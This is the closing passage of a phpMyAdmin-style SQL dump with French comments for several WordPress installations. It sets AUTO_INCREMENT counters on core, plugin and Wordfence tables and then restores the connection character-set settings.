  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=121;
--
-- AUTO_INCREMENT pour la table `reservation_seance_type`
--
ALTER TABLE `reservation_seance_type`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=135;
--
-- AUTO_INCREMENT pour la table `wp_commentmeta`
--
ALTER TABLE `wp_commentmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=35;
--
-- AUTO_INCREMENT pour la table `wp_comments`
--
ALTER TABLE `wp_comments`
  MODIFY `comment_ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=221;
--
-- AUTO_INCREMENT pour la table `wp_links`
--
ALTER TABLE `wp_links`
  MODIFY `link_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `wp_options`
--
ALTER TABLE `wp_options`
  MODIFY `option_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=129158;
--
-- AUTO_INCREMENT pour la table `wp_postmeta`
--
ALTER TABLE `wp_postmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2294;
--
-- AUTO_INCREMENT pour la table `wp_posts`
--
ALTER TABLE `wp_posts`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=500;
--
-- AUTO_INCREMENT pour la table `wp_termmeta`
--
ALTER TABLE `wp_termmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `wp_terms`
--
ALTER TABLE `wp_terms`
  MODIFY `term_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT pour la table `wp_term_taxonomy`
--
ALTER TABLE `wp_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT pour la table `wp_usermeta`
--
ALTER TABLE `wp_usermeta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=52;
--
-- AUTO_INCREMENT pour la table `wp_users`
--
ALTER TABLE `wp_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT pour la table `wp_wfBlocksAdv`
--
ALTER TABLE `wp_wfBlocksAdv`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `wp_wfHits`
--
ALTER TABLE `wp_wfHits`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=77692;
--
-- AUTO_INCREMENT pour la table `wp_wfHoover`
--
ALTER TABLE `wp_wfHoover`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
--
-- AUTO_INCREMENT pour la table `wp_wfIssues`
--
ALTER TABLE `wp_wfIssues`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11222;
--
-- AUTO_INCREMENT pour la table `wp_wfLogins`
--
ALTER TABLE `wp_wfLogins`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=104264;
--
-- AUTO_INCREMENT pour la table `wp_wfStatus`
--
ALTER TABLE `wp_wfStatus`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=118242;
--
-- AUTO_INCREMENT pour la table `www2_commentmeta`
--
ALTER TABLE `www2_commentmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_comments`
--
ALTER TABLE `www2_comments`
  MODIFY `comment_ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=170;
--
-- AUTO_INCREMENT pour la table `www2_duplicator_packages`
--
ALTER TABLE `www2_duplicator_packages`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT pour la table `www2_links`
--
ALTER TABLE `www2_links`
  MODIFY `link_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_options`
--
ALTER TABLE `www2_options`
  MODIFY `option_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=124433;
--
-- AUTO_INCREMENT pour la table `www2_postmeta`
--
ALTER TABLE `www2_postmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2294;
--
-- AUTO_INCREMENT pour la table `www2_posts`
--
ALTER TABLE `www2_posts`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=500;
--
-- AUTO_INCREMENT pour la table `www2_post_relationships`
--
ALTER TABLE `www2_post_relationships`
  MODIFY `relate_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_slideshow_plugin`
--
ALTER TABLE `www2_slideshow_plugin`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_termmeta`
--
ALTER TABLE `www2_termmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_terms`
--
ALTER TABLE `www2_terms`
  MODIFY `term_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT pour la table `www2_term_taxonomy`
--
ALTER TABLE `www2_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT pour la table `www2_usermeta`
--
ALTER TABLE `www2_usermeta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=51;
--
-- AUTO_INCREMENT pour la table `www2_users`
--
ALTER TABLE `www2_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT pour la table `www2_wfBlocksAdv`
--
ALTER TABLE `www2_wfBlocksAdv`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www2_wfHits`
--
ALTER TABLE `www2_wfHits`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=78889;
--
-- AUTO_INCREMENT pour la table `www2_wfHoover`
--
ALTER TABLE `www2_wfHoover`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;
--
-- AUTO_INCREMENT pour la table `www2_wfIssues`
--
ALTER TABLE `www2_wfIssues`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11222;
--
-- AUTO_INCREMENT pour la table `www2_wfLogins`
--
ALTER TABLE `www2_wfLogins`
  MODIFY `id` int(10) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=104269;
--
-- AUTO_INCREMENT pour la table `www2_wfStatus`
--
ALTER TABLE `www2_wfStatus`
  MODIFY `id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=118242;
--
-- AUTO_INCREMENT pour la table `www_commentmeta`
--
ALTER TABLE `www_commentmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=41;
--
-- AUTO_INCREMENT pour la table `www_comments`
--
ALTER TABLE `www_comments`
  MODIFY `comment_ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=21;
--
-- AUTO_INCREMENT pour la table `www_links`
--
ALTER TABLE `www_links`
  MODIFY `link_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www_options`
--
ALTER TABLE `www_options`
  MODIFY `option_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3336;
--
-- AUTO_INCREMENT pour la table `www_postmeta`
--
ALTER TABLE `www_postmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=1884;
--
-- AUTO_INCREMENT pour la table `www_posts`
--
ALTER TABLE `www_posts`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=456;
--
-- AUTO_INCREMENT pour la table `www_post_relationships`
--
ALTER TABLE `www_post_relationships`
  MODIFY `relate_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www_slideshow_plugin`
--
ALTER TABLE `www_slideshow_plugin`
  MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT pour la table `www_termmeta`
--
ALTER TABLE `www_termmeta`
  MODIFY `meta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT;
--
-- AUTO_INCREMENT pour la table `www_terms`
--
ALTER TABLE `www_terms`
  MODIFY `term_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT pour la table `www_term_taxonomy`
--
ALTER TABLE `www_term_taxonomy`
  MODIFY `term_taxonomy_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT pour la table `www_usermeta`
--
ALTER TABLE `www_usermeta`
  MODIFY `umeta_id` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=35;
--
-- AUTO_INCREMENT pour la table `www_users`
--
ALTER TABLE `www_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;